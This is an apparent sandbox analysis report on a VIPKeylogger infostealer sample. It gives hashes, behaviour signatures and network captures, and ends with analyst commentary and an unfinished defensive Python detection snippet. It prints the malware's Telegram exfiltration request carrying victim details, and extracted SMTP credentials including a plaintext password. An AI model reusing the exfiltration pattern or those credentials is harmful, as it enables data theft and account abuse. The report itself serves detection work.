Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26-01-2025 16:05

General

  • Target

    New Order #837989.exe

  • Size

    885KB

  • MD5

    d8f3a68154ffc12d0677b879a386dc0f

  • SHA1

    8be35f2b7a4c5454191181d72fc8da4eb7f48d1a

  • SHA256

    061bc2648b58846a4dc7cc468cbf1b4bcd2be744502ea0775b705b04ef536dfe

  • SHA512

    d119cd6f765b5de4095aba48ad0618623c78ebd9ca7c157d1cc48688af69e2b37e2e7a204dc01145c0c4425a113398c1feba26e84cc2df8a298a5bf4927942e8

  • SSDEEP

    12288:fzH2iNtAmJPkvxkTLj5+hMfgwBoyum1gfDWnKGv9TCf1povSAYqcv2ShtTFn+Kbt:fL1XAsWIL+MfDumwALv9mbOSAkZ+6us

Malware Config

Extracted

Family

vipkeylogger

Credentials

  • Protocol:
    smtp
  • Host:
    mail.aktagor-prom.by
  • Port:
    587
  • Username:
    office@aktagor-prom.by
  • Password:
    71z&rRC84
  • Email To:
    office@aktagor-prom.by

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C#. It closely resembles SnakeKeylogger, which was first observed in 2020.

  • Vipkeylogger family
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data (account settings, profiles, saved credentials) on disk, and infostealers often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and autofill data.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Order #837989.exe
    "C:\Users\Admin\AppData\Local\Temp\New Order #837989.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1496
    • C:\Users\Admin\AppData\Local\Temp\New Order #837989.exe
      "C:\Users\Admin\AppData\Local\Temp\New Order #837989.exe"
      2⤵
      • Accesses Microsoft Outlook profiles
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:1264

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    2.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    5.114.82.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.114.82.104.in-addr.arpa
    IN PTR
    Response
    5.114.82.104.in-addr.arpa
    IN PTR
    a104-82-114-5.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    149.220.183.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    149.220.183.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    checkip.dyndns.org
    New Order #837989.exe
    Remote address:
    8.8.8.8:53
    Request
    checkip.dyndns.org
    IN A
    Response
    checkip.dyndns.org
    IN CNAME
    checkip.dyndns.com
    checkip.dyndns.com
    IN A
    132.226.247.73
    checkip.dyndns.com
    IN A
    158.101.44.242
    checkip.dyndns.com
    IN A
    193.122.6.168
    checkip.dyndns.com
    IN A
    132.226.8.169
    checkip.dyndns.com
    IN A
    193.122.130.0
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:29 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:30 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 504 Gateway Time-out
    Date: Sun, 26 Jan 2025 16:05:34 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:34 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:34 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:35 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 504 Gateway Time-out
    Date: Sun, 26 Jan 2025 16:05:38 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 504 Gateway Time-out
    Date: Sun, 26 Jan 2025 16:05:41 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:42 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-br
    GET
    http://checkip.dyndns.org/
    New Order #837989.exe
    Remote address:
    132.226.247.73:80
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:43 GMT
    Content-Type: text/html
    Content-Length: 106
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
  • flag-us
    DNS
    73.247.226.132.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.247.226.132.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    reallyfreegeoip.org
    New Order #837989.exe
    Remote address:
    8.8.8.8:53
    Request
    reallyfreegeoip.org
    IN A
    Response
    reallyfreegeoip.org
    IN A
    104.21.112.1
    reallyfreegeoip.org
    IN A
    104.21.80.1
    reallyfreegeoip.org
    IN A
    104.21.32.1
    reallyfreegeoip.org
    IN A
    104.21.48.1
    reallyfreegeoip.org
    IN A
    104.21.64.1
    reallyfreegeoip.org
    IN A
    104.21.16.1
    reallyfreegeoip.org
    IN A
    104.21.96.1
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:31 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394985
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pxoMbHqUObozcOMqyHAuP9ZxXMkBHmtYo2PZWbBAgZcE0ilAh6LYN4J9vGqUqvAUwfHjc7WNrExOVCGm4Semh2nRn602Ga9RV2M4PMVVishYdbNKH1SWiqGTBpVcg1Yw22XXYE70"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081beb4fe4bf1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=52240&min_rtt=47624&rtt_var=18642&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3009&recv_bytes=390&delivery_rate=77818&cwnd=253&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=148&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:34 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394988
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FOA59A84sS3F3XzvMjW7PFXYssl9oOnQJWHZwlkgGOu0MJ0Z9vdsI0%2FM7tws9f9%2BCumwb63ZByyFGuopqTKLaHIOwZ8FrlBLeIQdLW9VGeD5516cI477Ln95cXBVLgGByyFbFThG"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081becb0f12f1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=56762&min_rtt=47624&rtt_var=23024&sent=6&recv=8&lost=0&retrans=0&sent_bytes=4272&recv_bytes=482&delivery_rate=77818&cwnd=254&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=3674&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:34 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394988
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2B2jt40NGDPEropet2bnNcztvFq2YUwaHM0F27J2vVlNSfBvhSs9jYfnciubu%2B4SLDJJGcYUji1Hy1%2FmmcM8%2B%2Bp8%2F1LrwYrVEltxobtwZlsel98g%2BVdZYgu24bFkcxMDqJSIFeTD"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081beccdc3af1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=61308&min_rtt=47624&rtt_var=26361&sent=7&recv=10&lost=0&retrans=0&sent_bytes=5542&recv_bytes=574&delivery_rate=77818&cwnd=255&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=3982&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:35 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394989
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ljf1PIcWqxKGO72Zwe4xGeERxKfa36UGunrwjfTVbs3prcQgr0dpymQv5nWqiAy6HPB%2BFmPui5ueA8XmenNsfujITCWJdoH0zoJxiD18C80c6kLYawoDp1JyPs6UfYZtcNnExGfP"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081becec938f1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=65972&min_rtt=47624&rtt_var=29099&sent=8&recv=12&lost=0&retrans=0&sent_bytes=6821&recv_bytes=666&delivery_rate=77818&cwnd=256&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=4282&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:42 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394996
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WVX7OWqEGscsQe2kucS8s8iuVUojF9lQ4UCkK6ox5ockmZyYZFaQMOXXRIdoqD6C8ptHUg1%2BdjP9b71maYorSJQDgj2lWWz80vg6eamdbtMUfXFe%2BmigygA6SUziAxpUJwj%2FalEV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081beff3a7bf1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=69546&min_rtt=47624&rtt_var=28972&sent=9&recv=14&lost=0&retrans=0&sent_bytes=8088&recv_bytes=758&delivery_rate=77818&cwnd=257&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=12039&x=0"
  • flag-us
    GET
    https://reallyfreegeoip.org/xml/181.215.176.83
    New Order #837989.exe
    Remote address:
    104.21.112.1:443
    Request
    GET /xml/181.215.176.83 HTTP/1.1
    Host: reallyfreegeoip.org
    Response
    HTTP/1.1 200 OK
    Date: Sun, 26 Jan 2025 16:05:43 GMT
    Content-Type: text/xml
    Content-Length: 356
    Connection: keep-alive
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 6394997
    Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2PY5n5Kh%2FPueYrauiFmwdlZAm39lcz6xPd15C9CLMq4g071VRGsQ9wc3S2Uzd82SNscqqZljQ45V6DwO2rx7nvMaAKMvzs1BfK6KJm4HmWccBVaD8NPAdP7W9t7If0i3Ao73LAn"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9081bf011817f1c4-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=73668&min_rtt=47624&rtt_var=29973&sent=10&recv=16&lost=0&retrans=0&sent_bytes=9360&recv_bytes=850&delivery_rate=77818&cwnd=257&unsent_bytes=0&cid=c00ddb8673d7beb0&ts=12325&x=0"
  • flag-us
    DNS
    1.112.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    212.20.149.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    212.20.149.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    api.telegram.org
    New Order #837989.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    GET
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:GUMLNLFE%0D%0ADate%20and%20Time:%201/26/2025%20/%204:05:41%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20GUMLNLFE%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
    New Order #837989.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:GUMLNLFE%0D%0ADate%20and%20Time:%201/26/2025%20/%204:05:41%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20GUMLNLFE%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Sun, 26 Jan 2025 16:05:43 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    mail.aktagor-prom.by
    New Order #837989.exe
    Remote address:
    8.8.8.8:53
    Request
    mail.aktagor-prom.by
    IN A
    Response
    mail.aktagor-prom.by
    IN CNAME
    webmail.active.by
    webmail.active.by
    IN A
    178.159.242.77
  • flag-us
    DNS
    77.242.159.178.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.242.159.178.in-addr.arpa
    IN PTR
    Response
    77.242.159.178.in-addr.arpa
    IN PTR
    webmail.active.by
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 132.226.247.73:80
    http://checkip.dyndns.org/
    http
    New Order #837989.exe
    2.4kB
    4.9kB
    22
    21

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    504

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    504

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    504

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200

    HTTP Request

    GET http://checkip.dyndns.org/

    HTTP Response

    200
  • 104.21.112.1:443
    https://reallyfreegeoip.org/xml/181.215.176.83
    tls, http
    New Order #837989.exe
    1.7kB
    11.2kB
    19
    13

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200

    HTTP Request

    GET https://reallyfreegeoip.org/xml/181.215.176.83

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:GUMLNLFE%0D%0ADate%20and%20Time:%201/26/2025%20/%204:05:41%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20GUMLNLFE%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
    tls, http
    New Order #837989.exe
    1.2kB
    6.7kB
    11
    11

    HTTP Request

    GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:GUMLNLFE%0D%0ADate%20and%20Time:%201/26/2025%20/%204:05:41%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20GUMLNLFE%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

    HTTP Response

    404
  • 178.159.242.77:587
    mail.aktagor-prom.by
    New Order #837989.exe
    144 B
    92 B
    3
    2
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    2.159.190.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    2.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    5.114.82.104.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    5.114.82.104.in-addr.arpa

  • 8.8.8.8:53
    149.220.183.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    149.220.183.52.in-addr.arpa

  • 8.8.8.8:53
    checkip.dyndns.org
    dns
    New Order #837989.exe
    64 B
    176 B
    1
    1

    DNS Request

    checkip.dyndns.org

    DNS Response

    132.226.247.73
    158.101.44.242
    193.122.6.168
    132.226.8.169
    193.122.130.0

  • 8.8.8.8:53
    73.247.226.132.in-addr.arpa
    dns
    73 B
    158 B
    1
    1

    DNS Request

    73.247.226.132.in-addr.arpa

  • 8.8.8.8:53
    reallyfreegeoip.org
    dns
    New Order #837989.exe
    65 B
    177 B
    1
    1

    DNS Request

    reallyfreegeoip.org

    DNS Response

    104.21.112.1
    104.21.80.1
    104.21.32.1
    104.21.48.1
    104.21.64.1
    104.21.16.1
    104.21.96.1

  • 8.8.8.8:53
    1.112.21.104.in-addr.arpa
    dns
    71 B
    133 B
    1
    1

    DNS Request

    1.112.21.104.in-addr.arpa

  • 8.8.8.8:53
    212.20.149.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    212.20.149.52.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    New Order #837989.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
    167 B
    1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    mail.aktagor-prom.by
    dns
    New Order #837989.exe
    66 B
    111 B
    1
    1

    DNS Request

    mail.aktagor-prom.by

    DNS Response

    178.159.242.77

  • 8.8.8.8:53
    77.242.159.178.in-addr.arpa
    dns
    73 B
    104 B
    1
    1

    DNS Request

    77.242.159.178.in-addr.arpa

  • 8.8.8.8:53
    43.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    43.229.111.52.in-addr.arpa

  • 8.8.8.8:53

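The network evidence above shows a fixed sequence from PID 1264: a plaintext GET to checkip.dyndns.org to learn the external IP, a GeoIP lookup of that IP at reallyfreegeoip.org/xml/181.215.176.83, then the exfil channels. The Telegram request is a `sendMessage` call with an empty bot token (`/bot/sendMessage`) and an empty `chat_id`, which is why the API answered 404 Not Found; that channel is unconfigured in this build, and the operative exfil path is the SMTP credential set in the extracted config (port 587 to mail.aktagor-prom.by, which CNAMEs to webmail.active.by). The sender and recipient are the same mailbox, office@aktagor-prom.by, so this is most likely a compromised legitimate account rather than attacker-owned infrastructure; treat the credentials as a notification item for that organisation, not as an indicator to block wholesale. The SMTP connection carried only 144 B out and 92 B in, so no message left the sandbox in this run. The User-Agent string on the checkip requests, `Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)`, is the other usable network indicator.

The following is an added example, not part of the sandbox output or any vendor tooling. It decodes the Telegram beacon into its fields and correlates the external-IP lookup, GeoIP lookup and exfil channel from one process inside a short window, which is the behavioural sequence worth alerting on rather than any single domain. The flow log is constructed from the timestamps and URLs above; the SMTP row's timestamp is assumed because the report gives none.

```python
"""Added example: decode the Telegram beacon and correlate the
ipcheck -> geoip -> exfil sequence from one process within a window."""
import csv
import io
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

IP_CHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
EXFIL_HOSTS = {"api.telegram.org"}
EXFIL_PORTS = {25, 465, 587}          # SMTP; the extracted config uses 587
STAGES = ("ipcheck", "geoip", "exfil")

# The request URL as captured in the report (token and chat_id are empty).
TELEGRAM_URL = ("https://api.telegram.org/bot/sendMessage?chat_id=&text="
                "%20%0D%0A%0D%0APC%20Name:GUMLNLFE%0D%0ADate%20and%20Time:%201/26/2025"
                "%20/%204:05:41%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20"
                "GUMLNLFE%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's"
                "%20mean%20the%20system%20storage's%20empty.%20%5D")

def parse_telegram_beacon(url):
    """Return token, chat_id and the 'Key: value' lines of the beacon text,
    or None if the URL is not a Bot API sendMessage call."""
    parts = urlsplit(url)
    m = re.fullmatch(r"/bot([^/]*)/sendMessage", parts.path)
    if parts.hostname != "api.telegram.org" or not m:
        return None
    q = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes values
    chat_id = q.get("chat_id", [""])[0]
    fields = {}
    for line in q.get("text", [""])[0].split("\r\n"):
        if ":" in line:
            k, v = line.split(":", 1)
            fields[k.strip()] = v.strip()
    return {"token": m.group(1), "chat_id": chat_id, "fields": fields,
            "configured": bool(m.group(1)) and bool(chat_id)}

# Constructed flow log: time, process, proto, host, port, detail.
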